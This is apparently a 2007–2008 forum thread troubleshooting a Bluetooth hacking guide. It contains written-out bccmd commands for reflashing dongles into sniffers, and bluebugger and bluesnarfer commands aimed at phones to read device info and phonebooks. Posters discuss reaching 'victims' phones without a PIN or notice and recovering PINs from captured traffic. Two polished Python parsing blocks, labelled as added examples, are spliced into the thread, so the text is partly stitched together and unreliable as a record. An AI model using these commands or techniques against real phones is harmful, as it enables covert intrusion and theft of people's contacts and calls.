Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: ACCEPT MASTER
Name: 'device1'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x33c LMP Ver: 1.1 (0x1) LMP Subver: 0x33c
Manufacturer: Cambridge Silicon Radio (10)

This is the output of my adapter, so i decided to do like you described and turned to the following:


bt ~ # bccmd psget -s 0x0000 0x02bf
USB product identifier: 0x0001 (1)
bt ~ # bccmd psget -s 0x0000 0x02be
USB vendor identifier: 0x0a12 (2578)
bt ~ # bccmd psset -s 0x0002 0x02bf 0x0002
Can't execute command: No such device or address (6)

I've already tried -s 0x0001-5 but it's not working, the same error every time.

Any ideas to get this adapter to work?

Thanks a lot Bluetooth guys :-)

imported_sardinemaster
12-19-2007, 01:35 AM
Google is the way forward, you're right, I just would have expected you to have made it clear in the first post... but there you go, you might want to add it to your first post to avoid newbie questions like mine.

h**p://en.wikipedia.org/wiki/Bluebugging

Cheers!

ju1ce
12-19-2007, 03:14 AM
green.. so I have 2 dongles that I can flash with the new firmware.. including the one i posted above.. any issues with using it as a regular bluetooth module for scanning/probing with the new firmware? or is it one or the other.. just wanted to confirm before I flashed it..

also.. the frontline app only seems to be supporting xp.. though bt3 seems to have a slimmed down version already built in..

have you played with an antenna at all with the bt devices? in practice I find that it's not as easy to get long range readings as the articles say.. the noise is so high that it needs to be fairly close up to actually see anything..

hooked it up to a 14dbi yagi and not a whole lot was noticed.

drgr33n
12-19-2007, 03:20 PM
Juststormy Have you tried 0x0000 ????

@ ju1ce I haven't even got my dongle yet !!! Although it was CSR it had the bluecore-4 ROM chipset so I couldn't get the new firmware on :( I'm waiting for my new dongle to arrive :D

To use as a normal dongle again I'm not 100 % sure but I don't think this will be possible until you reflash with your old firmware and change the product ID back??? But you know more than me at this point :D

juststormy
12-19-2007, 03:29 PM
Juststormy Have you tried 0x0000 ????


No, I didn't, but I'll try as soon as I am on my BT machine. I'll let you know if this brings success.

Thanks ;)

@Dr Green - can you post a example of your /etc/bluetooth.conf - this would be nice

imported_spudgunman
12-19-2007, 06:38 PM
@ spudgunman It looks like you may have some problems. Can you post the output of


bccmd psget -s 0x0001 0x02bf



bt ~ # bccmd psget -s 0x0001 0x02bf
Can't execute command: No such device or address (6)
bt ~ # bccmd pslist
0x0001 - Bluetooth address (8 bytes)
0x001e - Radio power table (36 bytes)
0x0021 - Default transmit power (2 bytes)
0x00dc - Unknown (28 bytes)
....
0x00ee - Unknown (2 bytes)
0x0191 - Unknown (20 bytes)
0x01f6 - Crystal frequency trim (2 bytes)
0x01f9 - Host interface (2 bytes)
0x0217 - Transmit offset (2 bytes)
0x0240 - TX pre-amplifier level (2 bytes)
0x0242 - RX single ended (2 bytes)
0x025c - Module security code (16 bytes)
0x02bf - USB product identifier (2 bytes)
bt ~ # bccmd psget -s 0x0000 0x0001
Bluetooth address: 0xe100 0x81ff 0x4100 0x0c00
bt ~ # bccmd psget -s 0x0000 0x0002
Country code: 0x0000 (0)
bt ~ # bccmd psget -s 0x0000 0x0003
Class of device: 0x00000000 (0)
bt ~ # bccmd psget -s 0x0000 0x0004
Device drift: 0x00fa (250)

imported_spudgunman
12-19-2007, 09:45 PM
will try that, is that in the same lines of this part of your guide?


This may not make sense now but it will very soon, so pay attention lol. There are multiple places to read bytes on the stick. Depending on what card you are using these can be different. In general these are "Default" (0x0000), "param" (0x0008), "psi" (0x0001), "psf" (0x0002) and "psrom" (0x0004). If yours is different you can keep trying until you run out of numbers and then take the dongle back

I got lost in the def and the memory space and that paragraph got me confused.


EDIT- some how I posted this before your answer, there seems to be a time issue on the server?

juststormy
12-19-2007, 09:50 PM
bt ~ # bccmd -d hci0 psset -s 0x0000 0x02bf 0x0002
Can't execute command: No such device or address (6)


Mh did not work @ Dr_Green.

Any other ideas to get into the sniff mode?
Thanks!

drgr33n
12-19-2007, 10:42 PM
try



bccmd psset -s 0x0000 0x02bf 0x0002

imported_spudgunman
12-20-2007, 04:02 PM
bt ~ # bccmd -d hci0 psset -s 0x0000 0x02bf 0x0002
Can't execute command: No such device or address (6)
Mh did not work @ Dr_Green.

Any other ideas to get into the sniff mode?
Thanks!

yea same here I tried 2,4,8 all with same results.

The_Denv
12-20-2007, 08:55 PM
Hello Dr_GrEen,

I followed your guide and only got to the DFU section lol.

Here are my results:


bt ~ # hciconfig -a revision
hci0: Type: USB
BD Address: 00:0E:E7:50:02:6F ACL MTU: 384:8 SCO MTU: 64:8
UP RUNNING
RX bytes:925 acl:0 sco:0 events:20 errors:0
TX bytes:65 acl:0 sco:0 commands:18 errors:0
Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'CSR - bc4'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 2.0 (0x3) HCI Rev: 0x7a6 LMP Ver: 2.0 (0x3) LMP Subver: 0x7a6
Manufacturer: Cambridge Silicon Radio (10)

bt ~ # dfutool -d hci0 archive backold.dfu
Can't find any DFU devices


I tried exploring with the DFU commands, but no joy.

dfutool - Device Firmware Upgrade utility ver 3.12

Usage:
dfutool [options] <command>

Options:
-d, --device <device> USB device
-h, --help Display help

Commands:
verify <dfu-file> Check firmware file
modify <dfu-file> Change firmware attributes
upgrade <dfu-file> Download a new firmware
archive <dfu-file> Upload the current firmware


I don't understand why it states there are no DFU devices as I have a 4GB datastick in one slot and a bluetooth device in the other USB slot. I can use hcitool and hciconfig well, I wonder what it could be? Any advice? Maybe it could be that it states CSR-bc4 [bluechip4]. I don't want to spend 100$ on a bt100 dongle lol.

Cheers

imported_spankdidly
12-21-2007, 09:03 PM
Yo Dr Green. I decided to give all of this a shot. I got a sniffing 0x0000 device now. The Tx goes up each time I do

hciconfig -a

But what the heck do I do now? How do I get into my cell phone? I can scan it. but it always gives me some sort of error. What next MANG!

jujuqka
12-22-2007, 02:02 AM
just got one question!
Has anybody gotten this thing to work other than Green?
if so how, cause i think this is a lost cause.. it's just too problematic!!:mad:

drgr33n
12-22-2007, 04:20 AM
Anybody having issues with the bluetooth sniffing guide could you post your outputs here and I will take a look.



mkdir bluesniff
cd bluesniff
hciconfig hci0 revision >> verson.txt
bccmd pslist -s 0x000f >> 0x000f-out.txt
bccmd pslist -s 0x0000 >> 0x0000-out.txt
bccmd pslist -s 0x0001 >> 0x0001-out.txt
bccmd pslist -s 0x0002 >> 0x0002-out.txt
bccmd pslist -s 0x0004 >> 0x0004-out.txt
bccmd pslist -s 0x0008 >> 0x0008-out.txt


Compress the bluesniff folder and upload to mediafire or something.

@ The_Denv Sounds like you have a ROM chipset.
@ spankdidly You have to flash the dongle with new firmware I will add to the post when I get time :D
@ jujuqka yes people have got this to work.

The_Denv
12-22-2007, 07:23 AM
@ The_Denv Sounds like you have a ROM chipset.


Doh!

Ah well, I hope I can find a dongle in the UK which has a RAM chipset. It never tells you on the packaging which is pathetic. So.. off to Google I go.

Thanks for pointing out my problem Dr ;)

EDIT:
I found a page listing a few bluetooth devices which support firmware modifying and are of C.S.R. [Cambridge Silicon Radio] origin. Here is the link for people that also encounter this problem:

http://www.evilgenius.de/2007/04/10/bluetooth-dongle-with-csr-chipset-and-flash-or-external-memory-using-flash/ By the way this website has a LOT of useful comments on the article so please read them as they are seriously helpful.

For people wanting to Google for a Fujitsu Siemens CSR RAM bluetooth dongle here is the Manufacturers number for the specific model: S26361-F3214-L10

I Google'd the model number on my bluetooth device 'bc03rut1-01' and found that Dr_GrEen was right. Microdirect.co.uk stated the following:

[bc03rut1-01] Uses a BlueCore3-Rom chipset from a leading Bluetooth chipset supplier

So it's a ROM alright :( ahh well. I'll have to buy a RAM one.

juststormy
12-22-2007, 12:34 PM
Anybody having issues with the bluetooth sniffing guide could you post your outputs here and I will take a look.


Thanks very much, that is a great help :-)

I uploaded it for you - hope you'll find the problem.

Thanks again very much!

http://rapidshare.de/files/38106128/juststormy.tar.html

drgr33n
12-22-2007, 04:06 PM
Hey juststormy

I've just had a look for you and it appears that the addresses you seek are in 0x0000.

If bccmd won't write to 0x0000 it may be a case of that those values are on the ROM.

try



bccmd psset -s 0x0000 0x02bf 0x0002


Just a warning, don't cut and paste here your x's will be wrong. Type it in your self.

juststormy
12-22-2007, 04:21 PM
Thanks Mr.Green,

I tried it again, but the same error appears as before.

Can't execute command: No such device or address (6)

Any other ideas to get this dongle working or is it just impossible with this?

drgr33n
12-22-2007, 04:51 PM
Just a couple of things

first, hciconfig -a revision was a typo; you should be using



hciconfig hci* revision


Post the output here..

The second is: are you enabling your adapter before you begin?



hciconfig hci0 up


Last thing is to try to get the value of 0x02bf on different addresses.



bccmd psget -s 0x0000 0x02bf
bccmd psget -s 0x0001 0x02bf
bccmd psget -s 0x0002 0x02bf
bccmd psget -s 0x0004 0x02bf
bccmd psget -s 0x0008 0x02bf


If it can read the value from 0x0000 but cannot write, you have problems; if it cannot read that address I'm baffled:D
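The diagnostic outputs requested a few posts up (one `bccmd pslist` dump per store) and the "try 0x02bf on every store" check above can be worked through offline. The following is an added example, not part of the thread or of bccmd: it parses the line format `bccmd pslist` prints, as pasted earlier in this thread, and reports which store(s) list a given key such as 0x02bf (USB product identifier). The store names are the ones the quoted guide gives; the sample dumps are constructed.

```python
"""Find which CSR persistent-store (pskey) store exposes a given key.

Added example for this thread, not part of bccmd or the original post.
It parses the text that `bccmd pslist -s <store>` prints and reports the
store(s) that list a key, so the per-store dump files can be checked
without the dongle attached. Sample outputs below are constructed.
"""
import re

# One line of `bccmd pslist` output: "0x02bf - USB product identifier (2 bytes)"
PSLIST_LINE = re.compile(
    r"^\s*0x([0-9a-fA-F]{4})\s+-\s+(.+?)\s+\((\d+)\s+bytes?\)\s*$"
)

# Store ids and names as the guide quoted in this thread lists them.
STORE_NAMES = {0x0000: "default", 0x0001: "psi", 0x0002: "psf",
               0x0004: "psrom", 0x0008: "param"}

USB_PRODUCT_ID_KEY = 0x02bf  # shown as "USB product identifier" by pslist


def parse_pslist(text):
    """Map key id -> (name, size in bytes) for every key a pslist dump shows.

    Lines that are not key entries (prompts, '....' truncation marks) are skipped.
    """
    keys = {}
    for line in text.splitlines():
        m = PSLIST_LINE.match(line)
        if m:
            keys[int(m.group(1), 16)] = (m.group(2), int(m.group(3)))
    return keys


def stores_with_key(store_dumps, key):
    """Given {store_id: pslist text}, return the sorted store ids that list `key`."""
    return sorted(sid for sid, text in store_dumps.items()
                  if key in parse_pslist(text))


def describe_stores(store_dumps, key):
    """Readable entries such as '0x0000 (default)' for each store exposing `key`."""
    return ["0x%04x (%s)" % (sid, STORE_NAMES.get(sid, "unnamed"))
            for sid in stores_with_key(store_dumps, key)]


# Constructed sample dumps: the default and psi stores expose the USB
# product id, the psrom store does not, and a truncated dump ("....")
# still parses cleanly.
SAMPLE_DUMPS = {
    0x0000: """bt ~ # bccmd pslist -s 0x0000
0x0001 - Bluetooth address (8 bytes)
0x001e - Radio power table (36 bytes)
....
0x02bf - USB product identifier (2 bytes)
""",
    0x0001: """0x0001 - Bluetooth address (8 bytes)
0x02bf - USB product identifier (2 bytes)
""",
    0x0004: """0x0001 - Bluetooth address (8 bytes)
0x01f6 - Crystal frequency trim (2 bytes)
""",
}

if __name__ == "__main__":
    for entry in describe_stores(SAMPLE_DUMPS, USB_PRODUCT_ID_KEY):
        print(entry)
```

Feed it the real `0x0000-out.txt`, `0x0001-out.txt`, ... files instead of `SAMPLE_DUMPS` to see where 0x02bf lives on your own dongle; a key that appears in no writable store is the ROM situation described above.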

moviezman
12-23-2007, 03:56 PM
I'm very new to this
I got the following steps to work
Setting up your bluetooth equipment
Scanning and fingerprinting devices
Connectivity and RFCOMM
But then when i enter

this in bluebugger

bluebugger -c 7 -a 00:1D:28:19:23:2B info

I must then enter a code on my mobile because it asked for it, so I enter the code 0000 because that's the standard code for my phone, but when I enter it and accept it I get the following error in bluebugger

First i get this but that is normal
Target Device: '00:1D:28:19:23:2B'
Target Name: 'P1i'

And after i typed in 0000 i get the error
Cannot open '/dev/rfcomm0': Connection refused

how can i solve this problem

Is it the Rfcomm connection?

This is what my Sdptool browse looks like

Browsing 00:1D:28:19:23:2B ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
"AV Remote Target" (0x110c)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service Name: AVRCP Controller
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10001
Service Class ID List:
"AV Remote" (0x110e)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service Name: m-Router Connectivity
Service Description: m-Router Connectivity
Service Provider: Symbian Ltd.
Service RecHandle: 0x10002
Service Class ID List:
UUID 128: a2157972-3541-4d0b-a551-b3abe639f526
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100

Service Name: m-Router Connectivity
Service Description: m-Router Connectivity
Service Provider: Symbian Ltd.
Service RecHandle: 0x10003
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100

Service Name: SEMC HLA
Service RecHandle: 0x10004
Service Class ID List:
"" (0x8e771301)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 61689
"" (0x8e770300)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x8e771303)
Version: 0x0100

Service Name: Dial-up Networking
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x10005
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Audio Streaming Source
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x10007
Service Class ID List:
"Audio Source" (0x110a)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 25
"AVDTP" (0x0019)
uint16: 0x100
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Advanced Audio" (0x110d)
Version: 0x0100

Service Name: Headset Audio Gateway
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: Hands-free Audio Gateway
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x1000b
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0105

Service Name: Object-push
Service RecHandle: 0x1000d
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: Bestandsoverdracht this is Dutch for file transfer
Service RecHandle: 0x1000e
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Personal Ad-hoc User Service
Service Description: Personal Ad-hoc User Service
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x1000f
Service Class ID List:
"PAN User" (0x1115)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 15
"BNEP" (0x000f)
Version: 0x0100
SEQ8: 0 6 dd
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"PAN User" (0x1115)
Version: 0x0100

Service Name: Group Ad-hoc Network Service
Service Description: Personal Group Ad-hoc Network Service
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10010
Service Class ID List:
"PAN Group Network" (0x1117)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 15
"BNEP" (0x000f)
Version: 0x0100
SEQ8: 0 6 dd
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"PAN Group Network" (0x1117)
Version: 0x0100

Service Name: Phonebook access PSE
Service Provider: Symbian Software Ltd
Service RecHandle: 0x10011
Service Class ID List:
"Phonebook Access - PSE" (0x112f)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x01
base_offset: 0x6a
Profile Descriptor List:
"Phonebook Access" (0x1130)
Version: 0x0100


As you can see the Dial is 7
File transfer is 5
Object push is 4

So i entered that in the Rfcomm

I am so confused what is good and bad please help what to do .
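The `sdptool browse` dump in the post above is where the channel numbers come from, and reading them by eye is error-prone. The block below is an added example, not part of the thread or of the bluez tools: it parses the record layout `sdptool browse` prints into a per-service table (name, class ids, RFCOMM channel or L2CAP PSM), so the channel a service sits on can be read off programmatically. The sample dump is constructed from a few records of the kind shown above.

```python
"""Parse `sdptool browse` output into a service/channel table.

Added example, not code from the thread or from bluez. The sample browse
output below is constructed to mirror the record layout pasted in the thread.
"""
import re

# A class-id line inside a "... List:" block, e.g. '"OBEX Object Push" (0x1105)'
CLASS_LINE = re.compile(r'^"(.*)"\s+\((0x[0-9a-fA-F]+)\)$')


def parse_sdp_browse(text):
    """Return one dict per service record found in the browse output."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {"name": None, "handle": None, "classes": [],
               "rfcomm_channel": None, "psm": None}
        section = None  # which "... List:" block we are currently inside
        for raw in chunk.splitlines():
            line = raw.strip()
            if line.startswith("Browsing "):
                continue  # header sdptool prints before the first record
            if line.startswith("Service Name:"):
                rec["name"] = line.split(":", 1)[1].strip()
            elif line.startswith("Service RecHandle:"):
                rec["handle"] = int(line.split(":", 1)[1].strip(), 16)
            elif line.endswith("List:"):
                section = line
            elif section == "Service Class ID List:":
                m = CLASS_LINE.match(line)
                if m:
                    rec["classes"].append((m.group(1), int(m.group(2), 16)))
                elif line.startswith("UUID 128:"):
                    rec["classes"].append((line.split(":", 1)[1].strip(), None))
            elif section == "Protocol Descriptor List:":
                m = re.match(r"Channel:\s*(\d+)$", line)
                if m:
                    rec["rfcomm_channel"] = int(m.group(1))  # follows "RFCOMM"
                m = re.match(r"PSM:\s*(\d+)$", line)
                if m:
                    rec["psm"] = int(m.group(1))  # follows "L2CAP" for non-RFCOMM services
        if rec["handle"] is not None:
            records.append(rec)
    return records


def rfcomm_channel_map(records):
    """{service name: RFCOMM channel} for every record that sits on RFCOMM."""
    return {r["name"]: r["rfcomm_channel"] for r in records
            if r["name"] and r["rfcomm_channel"] is not None}


def find_channel(records, class_id):
    """RFCOMM channel of the first record advertising `class_id` (16-bit UUID), else None."""
    for r in records:
        if any(cid == class_id for _, cid in r["classes"]):
            return r["rfcomm_channel"]
    return None


# Constructed sample: one L2CAP-only service and three RFCOMM services.
SAMPLE_BROWSE = """Browsing 00:11:22:33:44:55 ...
Service Name: AVRCP Target
Service RecHandle: 0x10000
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x100
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x10005
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100

Service Name: Object-push
Service RecHandle: 0x1000d
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 4
  "OBEX" (0x0008)

Service Name: OBEX File Transfer
Service RecHandle: 0x1000e
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 5
  "OBEX" (0x0008)
"""

if __name__ == "__main__":
    for name, channel in sorted(rfcomm_channel_map(parse_sdp_browse(SAMPLE_BROWSE)).items()):
        print("%-20s RFCOMM channel %d" % (name, channel))
```

Pipe a real `sdptool browse <bdaddr>` capture into `parse_sdp_browse` to get the same table for your own phone; services with a PSM but no channel (AVRCP, A2DP, PAN) are not RFCOMM services and cannot be reached with an `rfcomm`-based tool at all, which is one reason a guessed channel simply fails.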

The_Denv
12-24-2007, 07:44 AM
That last post just caused me to have an OCD fit :P

Could you please edit it and insert the 'code' tags please?

Dr_GrEen, how's the pentesting coming on? Have you started yet, because I think I read a few pages back that you actually haven't tried this yet?

It would be nice to start adding phone models [with manufacturer model code] to a vulnerability list within this thread on the first post ;) -- "one post to rule them all".

drgr33n
12-25-2007, 05:41 AM
@ moviesman Connection refused means your phone rejected the connection
@ The_Denv Yea Blue|track dev is slow at the mo it's Christmas :D but 1.0a will be ready v soon ;D V good idea about the phone list.! If we can get people to post I will add something to bluetrack too

On python script to stop all questions lol ;)

The_Denv
12-25-2007, 02:06 PM
@ moviesman Connection refused means your phone rejected the connection
@ The_Denv Yea Blue|track dev is slow at the mo it's Christmas :D but 1.0a will be ready v soon ;D V good idea about the phone list.! If we can get people to post I will add something to bluetrack too

On python script to stop all questions lol ;)

Happy days man, Christmas does slow things down. I read the other thread about the project your working on, pretty cool python script. I cant wait to try it out, great idea. Fast|Track is slick, so I can only guess what Blue|Track will be like :D

May the force be with you ¨_¨

rototo95
12-27-2007, 04:48 PM
Hi everybody,
I tried to use the bluesnarfer tool, so I did:
mknod -m 666 /dev/bluetooth/rfcomm0 c 216 0

OBEX PUSH service is on channel 6

so, then I run:

#bluesnarfer -C 6 -i -b 00:1X:A4:XX:A2:XX
device name: V630i

And nothing happens.
When I sniff with hcidump, there is no activity.

Does someone have an idea of the problem?

rototo95
12-27-2007, 05:07 PM
Hi everybody,

I try to use the Bluesnarfer tool but I run into a problem

First, I create this device:

mknod -m 666 /dev/bluetooth/rfcomm0 c 216 0

With sdptool, I can see that OBEX Push Service is on channel 6

Then, I run bluesnarfer:

# bluesnarfer -r 1-10 -C 6 -b 00:1C:A4:C2:A2:D6
device name: V630i

Nothing else happens.
When I look with Hcidump, there is no more activity.

Does someone have an idea?

taser
12-29-2007, 07:11 PM
ok i was wondering if i could get some help with this. I am pretty sure that I have configured my USB bluetooth right but whenever I run commands to my phone I always get errors like:


bt ~ # bluesnarfer -r l-100 -b 00:17:d5:e1:e2:55
bluesnarfer: hci_create_connection failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok

and
Cannot open '/dev/rfcomm0': Connection refused

any help would be helpful

stasik
01-01-2008, 10:02 PM
i have the same results as taser. i checked my channels and everything is ok. maybe it is important what type should be in rfcomm0? because after this result rfcomm0 is deleted. rfcomm1 never gets executed.. and another interesting thing: every time i execute the command, it asks on the phone (nokia 6310i) to accept or reject the connection. then it asks for a password (1234) and i get the result mentioned above. isn't it supposed to be unnoticed? maybe the class should be changed to 0x50204?? thanks in advance

unlazyfree
01-06-2008, 12:51 AM
ok i was wondering if i could get some help with this. I am pretty sure that I have configured my USB bluetooth right but whenever I run commands to my phone I always get errors like:


bt ~ # bluesnarfer -r l-100 -b 00:17:d5:e1:e2:55
bluesnarfer: hci_create_connection failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok

and
Cannot open '/dev/rfcomm0': Connection refused

any help would be helpful

I have this exact problem, plus this output

bt ~ # bccmd psset -s 0x0000 0x02bf 0x0002
Unsupported manufacturer

EDIT: I didn't look closely, mine says Cannot open...Connection reset by peer

unlazyfree
01-06-2008, 12:52 AM
i have the same results as taser. i checked my channels and everything is ok. maybe it is important what type should be in rfcomm0? because after this result rfcomm0 is deleted. rfcomm1 never gets executed.. and another interesting thing: every time i execute the command, it asks on the phone (nokia 6310i) to accept or reject the connection. then it asks for a password (1234) and i get the result mentioned above. isn't it supposed to be unnoticed? maybe the class should be changed to 0x50204?? thanks in advance

I tried changing my class to 0x50204 and still had the same problem

stasik
01-06-2008, 07:55 PM
did anyone get it working??? coz seems to me there is more questions than answers...

unlazyfree
01-07-2008, 07:46 AM
Actually I looked more closely and realized that my error says

cannot open /whatever/his/is. Connection RESET BY PEER, not refused.

Could that be because my phone is realizing what I'm trying to do?

medamarko
01-10-2008, 10:42 AM
I do everything from dr.green's tutorial! BTScanner finds my device with the 00:1A:75:BF:88:9C address, but that's all I can do, everything else isn't working! And I have the same problem as taser! I always get this:

bt ~ # bluesnarfer -i -b 00:1A:75:BF:88:9C
bluesnarfer: hci_create_connection failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Is a directory
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok

And when I try l2ping i get:

bt ~ # l2ping 00:1A:75:BF:88:9C
Can't connect: Operation already in progress

What should I do? Help?!

stasik
01-11-2008, 06:56 PM
i don't think u do anything wrong. my understanding is that all of this is connected to rfcomm. i tried and no luck, and i use nokia 6310i - very vulnerable. just hope for a different/another tutorial.

stlava
01-15-2008, 08:52 AM
I've been reading about bluetooth hacking. Now correct me if I'm wrong, and I think Dr_GrEeN would know, but the older cell phones are the most susceptible. From what I tried on my own phones and from reading it seems most modern cellphones (victims) prompt the user if they wish to accept an incoming connection. Which creates a problem.

Now can an attacker connect to a cellphone without having a pin? The reason why I ask is because I've read that when cellphones connect to their bluetooth headsets naturally everything is encrypted, but from capturing traffic an attacker can gather enough to generate the link key and then a pin... after which the traffic is wide open and the attacker has access to the phone and headset. The major problem is that generating the pin has to be done on a pico board, otherwise the victim has to sit around all day.

Also I haven't used any of the software but I don't see a command line argument to enter the pin, am I missing something?

stasik
01-15-2008, 08:07 PM
stlava u r right about finding the key used between device and phone, but my understanding is u have to capture traffic during pairing. but it should also work with traffic captured after, like with wep. then with that traffic and the mac of both devices u could get the pin. but y do u need it??? there was a video about recording a conversation when the victim uses a bluetooth headset with carwhisperer..
would be great to connect to a phone without any pin or notice of the victim. i have nokia 6310i, and after it asks for the pin, it disconnects.
still in search for a solution. if some1 has any info, SHARE!!!

stlava
01-17-2008, 04:27 AM
@stasik What the carwhisperer app does is basically check what the bluetooth devices are and look in a database to see if they match any of the known pins, which are commonly 0000 or 1234. Again not very useful if the key isn't default. But stasik, I think you and I are looking for the same thing. I believe you have to have the cellphone's pin to connect to it no matter what, with or without a headset.

stasik
01-17-2008, 07:48 PM
@stlava, i sold my belkin bluetooth and ordered a linksys usb bluetooth since in every tutorial linksys is mentioned. maybe that is the key to the success. when i get it i'll try all the tutorials again.
in the tutorial videos no one entered a pin. i think u change the bluetooth.conf with some code which will not ask for the key and will proceed. but for a start i don't mind inputting the key, i just wanna see the poxy phonebook on my pc...

unix_r00ter
01-20-2008, 10:24 PM
thanks, this helped me a LOT :)

drgr33n
01-21-2008, 06:54 PM
Sorry guys, haven't been around for a while, been busy. Sounds like most of your problems are non-vulnerable devices. Still working on bluetrack when I have time, but if you would like to try my unfinished python script here is the link.

http://www.mediafire.com/download.php?9szy24mttby

Sets the hacks up for you.

stlava
01-21-2008, 09:53 PM
Which bluetooth modules actually have the ability to be flashed. I know the BlueCore-4 external but I'm looking for specific modules.

The_Denv
01-22-2008, 03:43 AM
Which bluetooth modules actually have the ability to be flashed. I know the BlueCore-4 external but I'm looking for specific modules.

The answer was already in this thread:


...<snip>...
I found a page listing a few bluetooth devices which support firmware modifying and are of C.S.R. [Cambridge Silicon Radio] origin. Here is the link for people that also encounter this problem:

http://www.evilgenius.de/2007/04/10/bluetooth-dongle-with-csr-chipset-and-flash-or-external-memory-using-flash/ By the way this website has a LOT of useful comments on the article so please read them as they are seriously helpful.

For people wanting to Google for a Fujitsu Siemens CSR RAM bluetooth dongle here is the Manufacturers number for the specific model: S26361-F3214-L10

I Google'd the model number on my bluetooth device 'bc03rut1-01' and found that Dr_GrEen was right. Microdirect.co.uk stated the following:

